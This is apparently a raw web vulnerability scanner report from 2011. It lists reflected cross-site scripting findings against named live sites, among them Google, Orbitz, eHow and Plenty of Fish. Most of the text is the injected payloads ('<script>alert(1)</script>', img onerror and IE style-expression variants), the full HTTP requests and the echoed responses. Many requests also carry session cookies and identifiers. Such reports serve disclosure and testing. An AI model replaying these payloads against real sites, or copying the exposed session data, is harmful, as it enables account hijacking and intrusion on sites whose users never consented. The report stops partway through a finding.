GET /weight-management-and-body-image/?2da39'-alert(1)-'64118fe1441=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:13 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71939
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weight Management & Body Image - How To Informati ...[SNIP]... <fb:like href="http://www.ehow.com/weight-management-and-body-image/?2da39'-alert(1)-'64118fe1441=1" ref="like" width="300"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 25665<script>alert(1)</script>0604eb18ad9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html25665<script>alert(1)</script>0604eb18ad9?blockID=399825&feedID=3698 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Date: Wed, 02 Feb 2011 15:47:06 GMT Content-Length: 859 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html25665<script>alert(1)</script>0604eb18ad9?blockID=399825&feedID=3698"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd8b"><script>alert(1)</script>1ccb1a2cd18 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825dbd8b"><script>alert(1)</script>1ccb1a2cd18&feedID=3698 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 15:46:32 GMT Date: Wed, 02 Feb 2011 15:46:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="399825dbd8b"><script>alert(1)</script>1ccb1a2cd18"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35edc"><script>alert(1)</script>0b5c5c8ae8 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=369835edc"><script>alert(1)</script>0b5c5c8ae8 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 15:46:46 GMT Date: Wed, 02 Feb 2011 15:46:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 20c64(a)bb11cc7cdf6 was submitted in the hl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+boston&hl=en20c64(a)bb11cc7cdf6&prmd=ivnscm HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:50 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
1.457. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.google.com
Path:
/advanced_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15b95(a)f122f347a32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+boston&hl=en&prmd=ivnscm&15b95(a)f122f347a32=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a68a8(a)2fc3268e051 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+boston&hl=en&prmd=ivnscma68a8(a)2fc3268e051 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:50 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b05a6(a)914fa9d20b7 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+bostonb05a6(a)914fa9d20b7&hl=en&prmd=ivnscm HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:49 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 417bd(a)c494a2ec40e was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images?q=millenium+boston417bd(a)c494a2ec40e&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:53:22 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the 79b73' request parameter is copied into the HTML document as plain text between tags. The payload 43785<script>alert(1)</script>8587ea4b601 was submitted in the 79b73' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?79b73'43785<script>alert(1)</script>8587ea4b601 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Invision Power Services :: 404 File Not Found</ti ...[SNIP]... <br /> /index.php?79b73'43785<script>alert(1)</script>8587ea4b601 </div> ...[SNIP]...
1.462. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.invisionpower.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 24714<script>alert(1)</script>6e8c7271658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?24714<script>alert(1)</script>6e8c7271658=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f9d9"><img%20src%3da%20onerror%3dalert(1)>35c645f95fa was submitted in the REST URL parameter 1. This input was echoed as 9f9d9"><img src=a onerror=alert(1)>35c645f95fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Tshirt_Workout9f9d9"><img%20src%3da%20onerror%3dalert(1)>35c645f95fa/fitness/ab_exercises/136?cid=RSS HTTP/1.1 Host: www.mensfitness.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 14:33:45 GMT Server: Apache/2.2.3 (Red Hat) Age: 1 Cache-Control: max-age=43199 Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Expires: Wed, 02 Feb 2011 02:33:43 GMT Content-Type: text/html; charset=UTF-8 Via: 1.1 mdw107103 (MII-APC/1.6) Connection: close Content-Length: 45083
<html> <head>
<title>The T-Shirt Body Workout - Men's Fitness</title>
<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest, ...[SNIP]... <a href="/Tshirt_Workout9f9d9"><img src=a onerror=alert(1)>35c645f95fa/fitness/ab_exercises/136?page=2"> ...[SNIP]...
The value of the deal_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 954c0"style%3d"x%3aexpression(alert(1))"4d82bd8d62a was submitted in the deal_id parameter. This input was echoed as 954c0"style="x:expression(alert(1))"4d82bd8d62a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /App/GDDC?deal_id=aeromexico-winter-fares\954c0"style%3d"x%3aexpression(alert(1))"4d82bd8d62a HTTP/1.1 Host: www.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: OSC=E35A05AFA43F7428074770D0017AA45F; Path=/ Cache-Control: private Pragma: no-cache Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/ P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV" Content-Type: text/html Date: Wed, 02 Feb 2011 16:11:58 GMT Content-Length: 184528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-t ...[SNIP]... <Meta Name="DCSext.ndid" CONTENT="aeromexico-winter-fares\954c0"style="x:expression(alert(1))"4d82bd8d62a,NC"/> ...[SNIP]...
The value of the cnt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 505c6"style%3d"x%3aexpression(alert(1))"6c0248732b6 was submitted in the cnt parameter. This input was echoed as 505c6"style="x:expression(alert(1))"6c0248732b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO505c6"style%3d"x%3aexpression(alert(1))"6c0248732b6&type=oa_qs HTTP/1.1 Host: www.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: OSC=D880EA6E561408E7CB3D9A862553C227; Path=/ Cache-Control: private Pragma: no-cache Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/ P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV" Content-Type: text/html Date: Wed, 02 Feb 2011 16:10:26 GMT Content-Length: 186935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w ...[SNIP]... <Meta Name="DCSext.ndtab" CONTENT="PRO505c6"style="x:expression(alert(1))"6c0248732b6"/> ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 929f5"style%3d"x%3aexpression(alert(1))"10bcaca89b2 was submitted in the type parameter. This input was echoed as 929f5"style="x:expression(alert(1))"10bcaca89b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs929f5"style%3d"x%3aexpression(alert(1))"10bcaca89b2 HTTP/1.1 Host: www.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: OSC=84F195AE3CDB76F652543ADC1AC7645F; Path=/ Cache-Control: private Pragma: no-cache Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/ P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV" Content-Type: text/html Date: Wed, 02 Feb 2011 16:11:33 GMT Content-Length: 186870
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w ...[SNIP]... <Meta Name="DCSext.ndid" CONTENT="promotions,oa_qs929f5"style="x:expression(alert(1))"10bcaca89b2"/> ...[SNIP]...
1.467. http://www.plentyoffish.com/meetme.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.plentyoffish.com
Path:
/meetme.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b41c1"><script>alert(1)</script>b9320b26f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /meetme.aspx?b41c1"><script>alert(1)</script>b9320b26f68=1 HTTP/1.1 Host: www.plentyoffish.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 01 Feb 2011 01:30:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4357
<html><head><title>Find Singles with Plentyoffish FREE Online Dating Personals Service</title>
1.468. http://www.plentyoffish.com/needs_test.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.plentyoffish.com
Path:
/needs_test.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71843"><script>alert(1)</script>d3bff3c6b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
